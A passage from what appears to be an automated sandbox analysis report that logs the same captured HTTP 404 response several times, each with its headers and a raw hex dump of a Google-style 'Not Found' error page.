2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 